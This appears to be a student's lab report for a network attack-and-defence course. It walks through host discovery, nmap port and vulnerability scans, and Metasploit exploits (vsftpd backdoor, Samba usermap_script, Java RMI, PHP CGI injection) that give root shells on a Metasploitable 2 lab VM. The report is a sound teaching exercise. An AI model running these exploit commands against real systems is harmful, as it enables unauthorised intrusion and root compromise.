20232328 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

• 1.1主机发现与端口扫描
• 1.2 Vsftpd源码包后门漏洞（21端口）
• 1.3 SambaMS-RPC Shell命令注入漏洞（端口139）
• 1.4 Java RMI SERVER命令执行漏洞（1099端口）
• 1.5 PHP CGI参数执行注入漏洞（80端口）

2.实验准备

通过https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/ 点击下载zip文件

下载完成后进行解压，然后打开虚拟机，点文件中的扫描虚拟机

选择刚才解压的文件，然后勾选虚拟机，点完成

3.实验过程

3.1前期渗透

3.1.1主机渗透
首先在刚才安装的Metasploitable2主机上获取IP地址，输入iconfig
可以看到我的ip为：192.168.211.146

到kali虚拟机中打开msfconsole使用ARP中的arp_sweep进行主机发现

msfconsole  #打开Metasploit
search arp_sweep  #搜索ARP扫描相关辅助模块
use 0 #使用搜索结果中的第一个模块
set RHOSTS 192.168.211.0/24  #扫描虚拟机所在的网段
run  #开始扫描

根据扫描结果得出：靶机在线，网卡标识为VMWare,Inc.，证明这是VMWare虚拟机

3.1.2端口和版本扫描
这里采用windows主机下利用nmap进行端口扫描，因为我的kali使用nmap扫描的缓慢
运行下面命令来进行对靶机进行端口扫描和版本探测：

 nmap -sS -sV 192.168.211.146

可以看出靶机的版本为 metasploitable

3.1.3漏洞扫描
同理，在windows下使用nmap工具对靶机进行漏洞扫描，命令如下：

nmap -script=vuln 192.168.211.146

这个过程可能会有点长，经过实践kali终端的运行速度比windows终端快
扫描结果如下：

21端口：

• 服务与漏洞：目标主机的 21/tcp 端口运行 FTP 服务，存在vsFTPd版本2.3.4后门漏洞。
• 漏洞编号：BID:48539、CVE:CVE-2011-2523。
• 漏洞危害：该漏洞可被利用获取 root 权限（从 “Shell command: id” 的结果 “uid=0 (root) gid=0 (root)” 可验证），属于高危可利用漏洞。

25端口：

• 服务：25/tcp 端口运行 SMTP 服务。
• 漏洞类型：涉及 SSL/TLS 协议的多个加密漏洞，包括匿名 Diffie-Hellman 密钥交换中间人漏洞、Logjam 漏洞、DH 组强度不足漏洞、POODLE 信息泄露漏洞

漏洞详情

1. 匿名 Diffie-Hellman 密钥交换中间人漏洞

• 风险等级：高危。
• 技术说明：使用匿名 DH 组 1（1024 位），易被中间人攻击，可完全破坏会话的机密性和完整性

2. Logjam 漏洞（CVE-2015-4000）

• 风险等级：高危。
• 技术说明：支持 DHE_EXPORT 密码套件，可被降级到 512 位加密，攻击者易破解并篡改数据流。

3. Diffie-Hellman 组强度不足漏洞

• 风险等级：高危。
• 技术说明：使用弱 DH 组 1（1024 位），易被被动窃听。

4. SSL POODLE 信息泄露漏洞（CVE-2014-3566）

• 风险等级：高危。
• 技术说明：存在 SSL 3.0 或 CBC 填充 oracle 问题，易被获取明文数据。

1099端口：

RMI 注册表默认配置远程代码执行漏洞

• 风险等级：高危。
• 技术说明：RMI 注册表默认配置允许从远程 URL 加载类，可导致远程代码执行。
• 修复建议：修改 RMI 注册表配置，禁用远程类加载功能，或对 RMI 通信实施严格的访问控制。

5432端口：

SSL/TLS MITM 漏洞（CCS 注入，CVE-2014-0224）

• 风险等级：高危。
• 技术说明：OpenSSL 存在漏洞，中间人攻击者可通过伪造 TLS 握手触发使用零长度主密钥，进而劫持会话或获取敏感信息。
• 修复建议：升级 OpenSSL 到安全版本（0.9.8za、1.0.0m、1.0.1h 及以上），禁用存在漏洞的 SSL/TLS 配置。

SSL/TLS MITM 漏洞（CCS 注入，CVE-2014-0224）

• 风险等级：高危。
• 技术说明：OpenSSL 存在漏洞，中间人攻击者可通过伪造 TLS 握手触发使用零长度主密钥，进而劫持会话或获取敏感信息。
• 修复建议：升级 OpenSSL 到安全版本（0.9.8za、1.0.0m、1.0.1h 及以上），禁用存在漏洞的 SSL/TLS 配置。

Diffie-Hellman 组强度不足漏洞

• 风险等级：高危。
• 技术说明：使用弱 DH 组 1（1024 位），易被被动窃听。
• 修复建议：升级到 2048 位及以上的强 DH 组

SSL POODLE 信息泄露漏洞（CVE-2014-3566）

• 风险等级：高危。
• 技术说明：存在 SSL 3.0 或 CBC 填充 oracle 问题，易被获取明文数据。
• 修复建议：禁用 SSL 3.0 和存在漏洞的 CBC 密码套件，优先使用 TLS 1.2 及以上版本。

3.2Vsftpd源码包后门漏洞（21端口）

在kali中执行msfconsole，代码如下：

use exploit/unix/ftp/vsftpd_234_backdoor 
set RHOST 192.168.211.146
run

然后执行uname –a、 pwd、 id等命令验证

3.3 SambaMS-RPC Shell命令注入漏洞（端口139）

在kali中执行msfconsole，代码如下：

use exploit/multi/samba/usermap_script 
set RHOST 192.168.211.146  
exploit 

然后执行uname -a进行验证

得出确认目标主机为 Metasploitable 2 靶机，

• 内核版本：2.6.24-16-server
• 系统架构：i686（32 位系统）
• 系统类型：GNU/Linux（基于 Linux 内核的类 Unix 系统）
• 编译时间：2008年4月10日（距今多年，无后续安全更新）

3.4Java RMI SERVER命令执行漏洞（1099端口）

根据前面的实验步骤已经确定1099端口开放且存在漏洞
在kali中执行msfconsole，代码如下：

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.211.146 
run

执行sessions -i id操作，切换 / 交互已建立的 shell 会话，结果如下：

这里没有第二个会话所以报错了

使用shell 和whoami验证，首先使用shell进入进程，然后使用whoami验证得出root

3.5PHP CGI参数执行注入漏洞（80端口）

在kali中执行msfconsole ，代码如下：

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.211.146   
run 

然后输入shell进入进程，输入whoami进行验证

4.实验问题及解决方案

问题一：使用sessions -i id操作切换2时，因为没有第二个会话，发生报错之后，退出了这个会话。于是重新使用命令时，由于1会话并没有结束，会出现当前会话1正在使用的提示

问题一解决方案：使用exit -y退出会话

5.学习感悟和思考

通过本次 Metasploit 实践，我熟练掌握了主机发现、端口扫描、漏洞利用的完整渗透流程，对 vsftpd 后门、Samba 注入等经典漏洞的原理与利用逻辑有了直观认知。
Metasploit 的模块化设计大幅降低了漏洞利用门槛，但精准配置参数、识别会话状态等细节仍需严谨操作。
靶机中多个高危漏洞的暴露，也让我深刻意识到真实环境中及时更新系统、关闭无用服务、修复漏洞的重要性。